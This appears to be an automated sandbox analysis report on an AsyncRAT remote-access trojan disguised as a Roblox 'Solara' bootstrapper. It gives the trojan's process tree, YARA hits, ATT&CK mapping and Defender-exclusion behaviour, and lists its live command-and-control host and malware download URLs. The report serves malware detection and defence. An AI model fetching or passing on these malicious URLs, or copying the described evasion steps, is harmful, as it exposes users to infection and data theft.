Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match | File source: 2.0.not rat.exe.df0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.sDKRz09zM7.exe.3059b50.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.sDKRz09zM7.exe.3064190.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: sDKRz09zM7.exe PID: 7316, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\not rat.exe, type: DROPPED
Source: Amcache.hve.12.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.12.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: not rat.exe, 00000002.00000002.2630548369.000000001BF20000.00000004.00000020.00020000.00000000.sdmp, not rat.exe, 00000002.00000002.2612423692.0000000001300000.00000004.00000020.00020000.00000000.sdmp, not rat.exe, 00000002.00000002.2612423692.0000000001341000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.12.dr | Binary or memory string: MsMpEng.exe
Source: C:\Users\user\AppData\Roaming\not rat.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\not rat.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: 2.0.not rat.exe.df0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.sDKRz09zM7.exe.3059b50.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.sDKRz09zM7.exe.3064190.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2621953796.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: sDKRz09zM7.exe PID: 7316, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: not rat.exe PID: 7400, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\not rat.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: 2.0.not rat.exe.df0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.sDKRz09zM7.exe.3059b50.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.sDKRz09zM7.exe.3064190.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2621953796.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: sDKRz09zM7.exe PID: 7316, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: not rat.exe PID: 7400, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\not rat.exe, type: DROPPED
MITRE ATT&CK matrix, listed per tactic (a leading number is the count of signatures that matched the technique; entries without a number had no hits):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 12 Windows Management Instrumentation; 2 Scheduled Task/Job; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; 2 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 12 Process Injection; 2 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 12 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading; 11 Masquerading; 151 Virtualization/Sandbox Evasion; 12 Process Injection
Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 File and Directory Discovery; 23 System Information Discovery; 541 Security Software Discovery; 2 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; 1 Input Capture; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (ID 1566238, sample sDKRz09zM7.exe, start date 01/12/2024, architecture WINDOWS, score 100)

Sample-level DNS/IP info: award-adware.gl.at.ply.gg; www.nodejs.org; 7 other IPs or domains
Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 29 other signatures

Process tree:
  sDKRz09zM7.exe (started)
    Dropped: C:\Users\user\AppData\Roaming\not rat.exe (PE32); C:\...\BootstrapperV1.23_ModdedByHisako.exe (PE32+); C:\Users\user\AppData\...\sDKRz09zM7.exe.log (CSV)
    Signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    not rat.exe (started)
      DNS/IP: award-adware.gl.at.ply.gg 147.185.221.24, ports 49720, 49721, 8848, SALSGIVERUS, United States; ip-api.com 208.95.112.1, ports 49708, 80, TUT-ASUS, United States
      Dropped: C:\Users\user\AppData\Roaming\svchost.exe (PE32)
      Signatures: Protects its processes via BreakOnTermination flag; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Adds a directory exclusion to Windows Defender
      powershell.exe (started): signature Loading BitLocker PowerShell Module; starts conhost.exe
      powershell.exe (started): starts conhost.exe
      powershell.exe (started): starts conhost.exe
      2 other processes: start conhost.exe, conhost.exe
    BootstrapperV1.23_ModdedByHisako.exe (started)
      DNS/IP: edge-term4-lhr2.roblox.com 128.116.119.3, ports 443, 49710, ROBLOX-PRODUCTIONUS, United States; www.nodejs.org 104.20.22.46, ports 443, 49711, CLOUDFLARENETUS, United States; 2 other IPs or domains
      Dropped: \Device\ConDrv (ISO-8859)
      Signature: Multi AV Scanner detection for dropped file
      Starts: conhost.exe; WerFault.exe
  svchost.exe (started)
    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  svchost.exe (started)
    Starts: WerFault.exe
  4 other processes

Source | Detection | Scanner | Label | Link
sDKRz09zM7.exe | 66% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |
sDKRz09zM7.exe | 100% | Avira | TR/Dropper.Gen |
sDKRz09zM7.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\not rat.exe | 100% | Avira | TR/Spy.Gen |
C:\Users\user\AppData\Roaming\svchost.exe | 100% | Avira | TR/Spy.Gen |
C:\Users\user\AppData\Roaming\not rat.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\svchost.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Heracles |
C:\Users\user\AppData\Roaming\not rat.exe | 92% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |
C:\Users\user\AppData\Roaming\svchost.exe | 92% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://discord.com;http://127.0.0.1:6463/rpc?v=11 | 0% | Avira URL Cloud | safe |
http://127.0.0.1:6463/rpc?v=1 | 0% | Avira URL Cloud | safe |
http://127.0.0.1:6463 | 0% | Avira URL Cloud | safe |
http://127.0.0.1:64632 | 0% | Avira URL Cloud | safe |
award-adware.gl.at.ply.gg | 100% | Avira URL Cloud | malware |
https://8049c006.solaraweb-alj.pages.dev/download/static/files/Sola | 100% | Avira URL Cloud | malware |
https://8049c006.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip | 100% | Avira URL Cloud | malware |
https://8049c006.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe | 100% | Avira URL Cloud | malware |
https://8049c006.solaraweb-alj.pages.dev/download/static/files/Solao | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
nodejs.org | 104.20.22.46 | true | false | | high
getsolara.dev | 104.21.93.27 | true | false | | high
www.nodejs.org | 104.20.22.46 | true | false | | high
edge-term4-lhr2.roblox.com | 128.116.119.3 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high
award-adware.gl.at.ply.gg | 147.185.221.24 | true | true | | unknown
clientsettings.roblox.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://getsolara.dev/asset/discord.json | false | | high
https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live | false | | high
https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi | false | | high
award-adware.gl.at.ply.gg | true | Avira URL Cloud: malware | unknown
https://getsolara.dev/api/endpoint.json | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdng | svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/09/policy1p | svchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.microsoft | svchost.exe, 0000000E.00000002.2615972777.0000029107A13000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdthm= | svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.micom/pkiops/Docs/ry.htm0 | powershell.exe, 00000008.00000002.1617877847.000001D5E9C30000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://account.live.com/msangcwamvice | svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.microsoft.co | powershell.exe, 00000005.00000002.1478161767.000001A99FA9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1842400688.000001D2688A0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ncs.roblox.com/upload | BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBB0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB4F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.nodejs.org | BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdouroOOoD | svchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://login.microsoftonline.com/ppsecure/ResolveUser.srf | svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aka.ms/vs/17/release/vc_redist.x64.exe | BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdYBwk= | svchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000005.00000002.1471543702.000001A99745F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1603906589.000001D5E175F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1799985750.000001D210070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://Passport.NET/tb_sn | svchost.exe, 0000000E.00000002.2616206902.0000029107A59000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf | svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdecuri | svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://account.live.com/InlineSignup.aspx?iww=1&id=80502 | svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://127.0.0.1:6463/rpc?v=1 | BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB36000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | not rat.exe, 00000002.00000002.2621953796.0000000003081000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1448022364.000001A9873F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1513924048.000001D5D16F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664458722.000001D200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1886459813.000001B863871000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://Passport.NET/tb_ | svchost.exe, 0000000E.00000002.2616206902.0000029107A59000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://discord.com | BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfSt | svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000005.00000002.1448022364.000001A987618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1513924048.000001D5D1919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664458722.000001D200229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://account.live.com/msangcwam | svchost.exe, 0000000E.00000003.1560409249.0000029107557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp | false |
                                                                                                      high
                                                                                                      https://contoso.com/Iconpowershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://passport.net/tbsvchost.exe, 0000000E.00000002.2614689488.0000029106CB7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2616206902.0000029107A59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfsvchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd04/01svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://getsolara.devBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBAED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://discord.com;http://127.0.0.1:6463/rpc?v=11BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAAsvchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://Passport.NET/STS&lt;/ds:KeyName&gt;&lt;/ds:KeyInfo&gt;svchost.exe, 0000000E.00000002.2614257252.0000029106CAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://gitlab.com/cmd-softworks1/a/-/snippets/4768754/raw/main/endpoint.jsonBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.drfalse
                                                                                                                        high
                                                                                                                        https://8049c006.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exeBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        unknown
                                                                                                                        https://getsolara.devBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBAE2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://127.0.0.1:64632BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.1448022364.000001A987618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1513924048.000001D5D1919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664458722.000001D200229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
